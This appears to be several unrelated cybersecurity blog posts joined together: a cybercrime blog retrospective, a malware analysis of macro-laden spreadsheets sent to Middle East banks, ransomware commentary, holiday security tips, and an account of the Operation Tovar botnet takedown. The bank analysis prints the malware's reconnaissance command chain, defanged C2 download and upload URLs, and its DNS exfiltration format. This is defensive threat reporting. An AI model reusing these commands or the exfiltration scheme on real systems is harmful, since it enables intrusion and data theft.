    In 2008, we were just getting seriously up to ability with the UAB Spam Data Mine, and found many interesting malware campaigns using these techniques, which eventually led to the creation of Malcovery Security, later acquired by PhishMe

    Top Cybercrime & Doing Time Blog Posts of 2007
    Is Your Fifth Grader Smarter Than a Laughing Cat?15OCT2007
    Google Referrer Only malware sites13DEC2007
    AffPower Indictments Scare Affiliates!06AUG2007
    TJX: From Florida to the Ukraine?04SEP2007

    In 2007, the Storm Worm was one of the top spreaders of malware. The Laughing Cat story pointed out that if you share your computer with younger family members, they may very well click on lures that any educated adult would reject. The AffPower case remains one of my favorite law enforcement actions against online pharmaceutical affiliate programs. The TJX story tracked some of the carders involved in the TJX data breach.

    Top Cybercrime & Doing Time Blog Posts of 2006
    Pump & Dump: SEC gives us a peek!21DEC2006
    Counterfeit Checks? Who cares!12OCT2006
    Birmingham InfraGard - October 200610OCT2006
    FAL$E HOPE$ @ CHRI$TMA$22DEC2006

    In 2006, our inaugural year, we didn't have a lot of stories, honestly. Pump & Dump spam was interesting that year, and we blogged about some of the holiday scams we were seeing.

    Unfortunately, several of the graphics in the older stories are unavailable due to changes in hosting. Hopefully we'll get those recovered eventually. Sorry for any loss of enjoyment that may cause while strolling down Cybercrime Memory Lane with me!

    Looking forward to another Ten Years informing the public about Cybercrime & Doing Time!

    Thanks to all of my friends and students who encouraged this blog along the way, and helped through their dedication to fighting Cybercrime and sharing in the analysis we did together. While there have been tons of great contributors in the lab, with regards to things that ended up in the blog I'd like to especially thank: Heather McCalley, Matthew Grant, Chun Wei, Brad Wardman, Brian Tanner, Tommy Stallings, Sarah Turner, Josh Larkins, Jui Sonwalker, JohnHenri Ewerth, Brendan Griffin, and Kyle Jones.

    Thanks also to my inspirations in blogging, Brian Krebs, and Graham Cluley. This amateur blogger is truly grateful for what you guys do and share!

    Targeted Attacks against Banks in the Middle East

    UPDATE (Dec. 8, 2017): We now attribute this campaign to APT34, a suspected Iranian cyber espionage threat group that we believe has been active since at least 2014. Learn more about APT34 and their late 2017 targeting of a government organization in the Middle East.


    In the first week of May 2016, FireEye’s DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region. The threat actors appear to be performing initial reconnaissance against would-be targets, and the attacks caught our attention since they were using unique scripts not commonly seen in crimeware campaigns.

    In this blog we discuss in detail the tools, tactics, techniques and procedures (TTPs) used in these targeted attacks.

    Delivery Method

    The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East. The themes of the messages used in the attacks are related to IT Infrastructure such as a log of Server Status Report or a list of Cisco Iron Port Appliance details. In one case, the content of the email appeared to be a legitimate email conversation between several employees, even containing contact details of employees from several banks. This email was then forwarded to several people, with the malicious Excel file attached.

    Macro Details

    The macro first calls an Init() function (shown in Figure 1) that performs the following malicious activities:

    1. Extracts base64-encoded content from the cells within a worksheet titled "Incompatible".
    2. Checks for the presence of a file at the path %PUBLIC%\Libraries\ update.vbs. If the file is not present, the macro creates three different directories under %PUBLIC%\Libraries, namely up, dn, and tp.
    3. The extracted content from step one is decoded using PowerShell and dropped into two different files: %PUBLIC%\Libraries\update.vbs and %PUBLIC%\Libraries\dns.ps1
    4. The macro then creates a scheduled task with name: GoogleUpdateTaskMachineUI, which executes update.vbs every three minutes.

    Note: Due to the use of a hardcoded environment variable %PUBLIC% in the macro code, the macro will only run successfully on Windows Vista and subsequent versions of the operating system.

    Figure 1: Macro Init() subroutine

    Run-time Unhiding of Content

    One of the interesting techniques we observed in this attack was the display of additional content after the macro executed successfully. This was done for the purpose of social engineering – specifically, to convince the victim that enabling the macro did in fact result in the “unhiding” of additional spreadsheet data.

    Office documents containing malicious macros are commonly used in crimeware campaigns. Because default Office settings typically require user action in order for macros to run, attackers may convince victims to enable risky macro code by telling them that the macro is required to view “protected content.”

    In crimeware campaigns, we usually observe that no additional content is displayed after enabling the macros. However, in this case, attackers took the extra step to actually hide and unhide worksheets when the macro is enabled to allay any suspicion. A screenshot of the worksheet before and after running the macro is shown in Figure 2 and Figure 3, respectively.

    Figure 2: Before unhiding of content

    Figure 3: After unhiding of content

    In the following code section, we can see that the subroutine ShowHideSheets() is called after the Init() subroutine executes completely:

    Private Sub Workbook_Open()
        Call Init

            Call ShowHideSheets
    End Sub

    The code of subroutine ShowHideSheets(), which unhides the content after completion of malicious activities, is shown in Figure 4.

    Figure 4: Macro used to unhide content at runtime

    First Stage Download

    After the macro successfully creates the scheduled task, the dropped VBScript, update.vbs (Figure 5), will be launched every three minutes. This VBScript performs the following operations:

    1. Leverages PowerShell to download content from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\dwn&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
    2. Uses PowerShell to download a BAT file from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\bat&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
    3. Executes the BAT file and stores the results in a file in the path %PUBLIC%\Libraries\up.
    4. Uploads this file to the server by sending an HTTP POST request to the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\upl&m=u.
    5. Finally, it executes the PowerShell script dns.ps1, which is used for the purpose of data exfiltration using DNS.

    Figure 5: Content of update.vbs

    During our analysis, the VBScript downloaded a customized version of Mimikatz in the previously mentioned step one. The customized version uses its own default prompt string as well as its own console title, as shown in Figure 6.

    Figure 6: Custom version of Mimikatz used to extract user password hashes

    Similarly, the contents of the BAT file downloaded in step two are shown in Figure 7:

    whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1

    Figure 7: Content of downloaded BAT script

    This BAT file is used to collect important information from the system, including the currently logged on user, the hostname, network configuration data, user and group accounts, local and domain administrator accounts, running processes, and other data.

    Data Exfiltration over DNS

    Another interesting technique leveraged by this malware was the use of DNS queries as a data exfiltration channel. This was likely done because DNS is required for normal network operations. The DNS protocol is unlikely to be blocked (allowing free communications out of the network) and its use is unlikely to raise suspicion among network defenders.

    The script dns.ps1, dropped by the macro, is used for this purpose. In the following section, we describe its functionality in detail.

    1. The script requests an ID (through the DNS protocol) from go0gIe[.]com. This ID will then be saved into the PowerShell script.
    2. Next, the script queries the C2 server for additional instructions. If no further actions are requested, the script exits and will be activated again the next time update.vbs is called.
    3. If an action is required, the DNS server replies with an IP with the pattern 33.33.xx.yy. The script then proceeds to create a file at %PUBLIC%\Libraries\tp\chr(xx)chr(yy).bat. The script then proceeds to make DNS requests to fetch more data. Each DNS request results in the C2 server returning an IP address. Each octet of the IP address is interpreted as the decimal representation of an ASCII character; for example, the decimal number 99 is equivalent to the ASCII character ‘c’. The characters represented by the octets of the IP address are appended to the batch file to construct a script. The C2 server signals the end of the data stream by replying to a DNS query with the IP address
    4. Once the file has been successfully transferred, the BAT file will be run and its output saved as %PUBLIC%\Libraries\tp\chr(xx)chr(yy).txt.
    5. The text file containing the results of the BAT script will then be uploaded to the DNS server by embedding file data into part of the subdomain. The format of the DNS query used is shown in Table 1.
    6. The BAT file and the text file will then be deleted. The script then quits, to be invoked again upon running the next scheduled task.

    The DNS communication portion of the script is shown in Figure 8, along with a table showing the various subdomain formats being generated by the script.

    Figure 8: Code Snippet of dns.ps1

    Format of subdomains used in DNS C2 protocol:

    Subdomain used to request for BotID, used in step 2 above

    [00][botid]00000[base36 random number]30

    Subdomain used while performing file transfers used in step 3 above

    [00][botid]00000[base36 random number]232A[hex_filename][i-counter]

    Subdomain used while performing file upload, used in step 5 above

    [00][botid][cmdid][partid][base36 random number][48-hex-char-of-file-content]

    Table 1: C2 Protocol Format


    Although this attack did not leverage any zero-days or other advanced techniques, it was interesting to see how attackers used different components to perform reconnaissance activities on a specific target.

    This attack also demonstrates that macro malware is effective even today. Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

    “Ransomware threat highlighted by Los Angeles hospital payout”

    Team Cymru has three quotes in New Scientist. Big thanks to Sam Wong who wrote the piece!

    Ransomware has really exploded in the last couple of years,” says Steve Santorelli, a former UK police detective who now works for Team Cymru , a threat intelligence firm based in Florida. One ransomware package, CryptoLocker 3.0, is thought to have earned attackers $325 million in 2015 alone.

    This is not to say the criminals can’t be tracked down. “Good cybercrime investigation is about turning over thousands of little rocks looking for the mistakes that the criminals have made,” says Santorelli. And they always make mistakes.”

    Many more hospitals may have been attacked by cybercriminals, but we never hear about it because they keep things under wraps. “People don’t want to rock consumer confidence, and having your medical history stolen is pretty horrific,” says Santorelli. “This is going to be devastating to the victims.”

    Read full article here

    Photo Credit, ‘Ransom demand’ by Keith Hall, used under Creative Commons license 2.0

    Pukka Firewall Lessons from Jamie Oliver

    Pukka Firewall Lessons from Jamie Oliver

    In our office I’m willing to bet that food is discussed on average three times a day. Monday mornings will be spent waxing lyrical about the culinary masterpiece we’ve managed to prepare over the weekend. Then at around 11 someone will say, “Where are we going for lunch?” Before going home that evening, maybe there’s a question about the latest eatery in town. 

    I expect your office chit chat is not too dissimilar to ours, because food and what we do with it has skyrocketed in popularity over the past few years. Cookery programmes like Jamie Oliver's 30 minute meals, the Great British Bake-off and Masterchef have been a big influence. 

    Our food obsession, however, might be putting us all at risk, and I don’t just mean from an expanded waistline. Cyber criminals appear to have turned their attention to the food industry, targeting Jamie Oliver’s website with malware. This is the second time that malware has been found on site. News originally broke back in February, and the problem was thought to have been resolved. Then, following a routine site inspection on the 13th of March, webmasters found that the malware had returned or had never actually been completely removed. 

    It’s no surprise that cyber criminals have associated themselves with Jamie Oliver, since they’ve been leeching on pop culture and celebrities for years. Back in 2008, typing a star’s name into a search engine and straying away from the official sites was a sure fire way to get malware. Now it seems they’ve cut out the middleman, going straight to the source. This malware was planted directly onto

    Apart from bad press, Jamie Oliver has come away unscathed. Nobody has been seriously affected and the situation could have been much worse had the malware got into an organisational network. 

    Even with no real damage there’s an important lesson to be learned. Keep your firewall up to date so it can identify nefarious code contained within web pages or applications. If such code tries to execute itself on your machine, a good firewall will identify this as malware.

    3 Rules for Cyber Monday

    3 Rules for Cyber Monday

    It’s nearly here again folks, and the clues are all there: planning the office Christmas party, your boss humming Rudolph the Red Nosed Reindeer and an armada of Amazon packages arriving.

    Which brings me nicely to the topic of this blog: online shopping at work.

    It’s official; we are ‘in love’ with online shopping. At this time of the year, it’s harder to resist temptation. Retailers conjure up special shopping events like Black Friday and Cyber Monday - all aimed at getting us to part with our hard earned cash. While online retailers rub their hands in anticipation of December 1st, for companies without proper web security, the online shopping season could turn out to be the nightmare before Christmas.

    In a recent survey by RetailMeNot, a digital coupon provider, 86 percent of working consumers admitted that they planned to spend at least some time shopping or browsing online for gifts during working hours on Cyber Monday. That equates to a whole lot of lost productivity and unnecessary pressure on your bandwidth.

    To help prevent distraction and clogged bandwidth, I know of one customer, I’m sure there are others, who is allowing his employees time to shop from their desks in their lunch breaks. He’s a smart man - productivity stays high and employees happy.

    But productivity isn’t the only concern for the IT department – cyber criminals are out in force at this time of year, trying to take advantage of big hearts and open wallets with spam and phishing emails. One click on a seemingly innocent link could take your entire network down.

    To keep such bad tidings at bay, here’s a web security checklist to ensure your holiday season is filled with cheer not fear.

    1.  Flexible Filtering. Set time quotas to allow online shopping access at lunchtimes, or outside of core hours. Whatever you decide is reasonable, make sure your employees are kept in the loop about what you classify as acceptable usage and communicate this through an Acceptable Usage Policy.

    2.  Invest in Anti-malware and Anti-spam Controls. As inboxes start to fill with special offer emails, it gets more difficult to differentiate between legitimate emails and spam. These controls will go some way towards separating the wheat from the chaff.

    3.  Issue Safety Advice to Your Employees. Ask employees to check the legitimacy of a site before purchasing anything. The locked padlock symbol indicates that the purchase is encrypted and secure. In addition, brief them to be alert for phishing scams and not to open emails, or click on links from unknown contacts.

    Operation Tovar: The Latest Attempt to Eliminate Key Botnets

    Coordinated botnet disruptions have increased in pace and popularity over the last few years as more private companies work with international law enforcement agencies to combat malware infections on a grand scale. Operation Tovar, announced on June 2 2014, is the latest to make headlines. The target of the investigation, Evgeniy Mikhailovich Bogachev, was indicted by the Department of Justice and is wanted by the FBI for his role as alleged leader of the Gameover ZeuS and CryptoLocker botnets. Four other defendants were indicted using their pseudonyms. Though Bogachev’s current activities aren’t known, the Operation Tovar task force has maintained control of the botnet infrastructure and remediation efforts are ongoing.

    While new malware strains are released with increasing frequency, it’s easy to forget why Gameover and CryptoLocker are worthwhile targets for takedown operations. Both offered more advanced features than their peers and typified the increasingly sophisticated cybercriminal enterprises behind botnets.

    Gameover ZeuS

    Since the ZeuS source code was released in 2011, several new variants have appeared in the wild. Citadel, KINS, ICE IX, and Gameover have all improved upon the basic ZeuS model by introducing new features, using better encryption, and modifying command and control (C2) communication methods.

    Gameover uses a peer-to-peer (P2P) system for C2 communication. Though other P2P botnets such as Kelihos exist, Gameover is notable for its use of proxy nodes to introduce complexity into the standard P2P infrastructure. These proxy nodes are specific machines designated as relay points through which the botnet operators send commands and receive stolen information. This minimizes the number of systems that actually communicate with C2 servers. C2 commands are signed using RSA-2048 and encrypted with RC4 making it very difficult to tamper with the botnet.

    Additionally, Gameover maintains a failsafe mechanism: a domain generation algorithm (DGA) that produces 1,000 domains each week. This feature enables the operators to maintain control of their botnet even if the P2P infrastructure is compromised. The DGA produces long, nonsensical strings at one of six top-level domains: .com, .net, .org, .biz, .info, and .ru that can be registered and used to send commands to the botnet.

    ZeuS and all its variants are information-stealing trojans. We refer to them as banking trojans because that’s where they excel and Gameover is no exception. Gameover is able to trick the user into handing over personal information and can even defeat two-factor authentication. It accomplishes this by injecting custom code into the browser when a victim visits certain websites. Gameover’s arsenal of bank account takeover tools includes 1,500 web injections that were custom-made to target the websites of more than 700 financial institutions worldwide.

    In addition to its exceptional abilities as a banking trojan, Gameover is capable of a wider variety of data theft activities. An Operation Tovar task force member, speaking to Brian Krebs on the condition of anonymity, said they have evidence of additional harvested data and that Gameover targeted proprietary information.


    Not content with merely engaging in widespread banking credential and information theft, the Gameover criminal operators decided to maximize returns by infecting systems with CryptoLocker. It is a type of ransomware that encrypts the files on infected machines and then demands a ransom of hundreds of dollars in order to receive a decryption key. Typically, victims were given 72 hours to pay the ransom in bitcoins or risk losing their data.

    Unwilling to miss out on any opportunity to generate revenue, the criminal operators set up a website to assist victims in paying the ransom in bitcoins. Through this website, victims could complete the transaction and track the status of their “order” – the ransom payment in exchange for the decryption key. Some victims, unwilling or unable to pay the ransom, missed the 72-hour deadline only to see the ransom demand increase fivefold.

    Law enforcement officials discouraged people from paying the ransom since it would fund a criminal organization, but without back ups many victims had little choice but to pay. A US police department paid $750 for two Bitcoins as ransom after CryptoLocker was installed on a system used for police reports and booking photos. CryptoLocker encrypts files using asymmetric encryption, making use of a public and a private key. Without the private key, located on the criminals’ servers, infected files probably cannot be decrypted.

    The Target

    Operation Tovar’s investigation began with a server in the UK. A trail of wire transfers, money mules, criminal servers, and at least one confidential source led investigators to Bogachev. He is a Russian citizen wanted on charges of conspiracy to participate in racketeering activity, bank fraud, conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to violate the Identity Theft and Assumption Deterrence Act, aggravated identity theft, conspiracy, computer fraud, wire fraud, and money laundering. The FBI estimates the financial toll of Gameover at over $100 million and another estimate is that more than $27 million in ransom payments were made in the first two months of CryptoLocker’s distribution.

    Obtaining an indictment against a Russian national who will likely never be extradited to the United States isn’t sufficient to put an end to a criminal organization. In 2011, Russian citizen Aleksandr Andreevich Panin was indicted in the US on 23 counts related to the development and distribution of SpyEye but was not arrested until 2013 when he flew through Hartsfield-Jackson Atlanta International Airport. The Russian government, in a travel warning to its citizens, specifically mentions Panin and recommends that Russians facing legal action in the US should refrain from travelling internationally.

    The Takeover

    Drawing on the technical expertise of its members, the Operation Tovar task force was able to exploit flaws in the design of Gameover’s P2P network to manipulate the peer list and redirect traffic to nodes under its control. The specific technical details have not been released to the public in order to prevent the criminals from regaining control.

    Gameover’s failsafe mechanism, the DGA that was supposed to have allowed the criminals to maintain control in the event of a P2P disruption, was reverse engineered by task force members. The FBI then obtained a restraining order to redirect any attempts to register those domains to a government-run server. Furthermore, US service providers are required to block connections to the Russian .ru domains generated by the DGA since the US has no jurisdiction to prevent their registration.

    CryptoLocker also used a DGA for determining C2 locations. The algorithm was reverse engineered and the C2 servers were identified and seized by the Operation Tovar task force. Due to the use of an asymmetric key algorithm, CryptoLocker victims whose files remain encrypted currently have no avenue of remediation.

    Operation Tovar’s success can be measured by two factors: (1) Have the criminals regained control of their botnets and (2) Is the malware being removed from infected machines? While we can’t say for certain that the people responsible for Gameover and CryptoLocker have ceased all criminal activity, they have not regained control of the network disrupted by Operation Tovar. Based on this fact alone, the task force should be commended. Successful botnet disruptions are very challenging. Attempted takeovers over Kelihos have been undone after only two weeks.

    The remediation of infected machines is an even more difficult task. US-CERT has published a list of recommended actions and resources, and a number of the private companies involved in Operation Tovar have released scanning tools. The onus remains on individuals and organizations to use these resources to determine if they are infected and take the appropriate steps to remediate the problem. Statistics published by The Shadowserver Foundation show the number of machines infected with Gameover has remained essentially flat since the takeover. There are simply not enough people taking advantage of the resources available to remediate their systems.


    The task force has taken control of the C2 network and now some people may believe that the malware is neutered and no further action is required. It is important to remember that any malware is unauthorized code running on a computer. The integrity of the system is still compromised, regardless of who is in control of the botnet.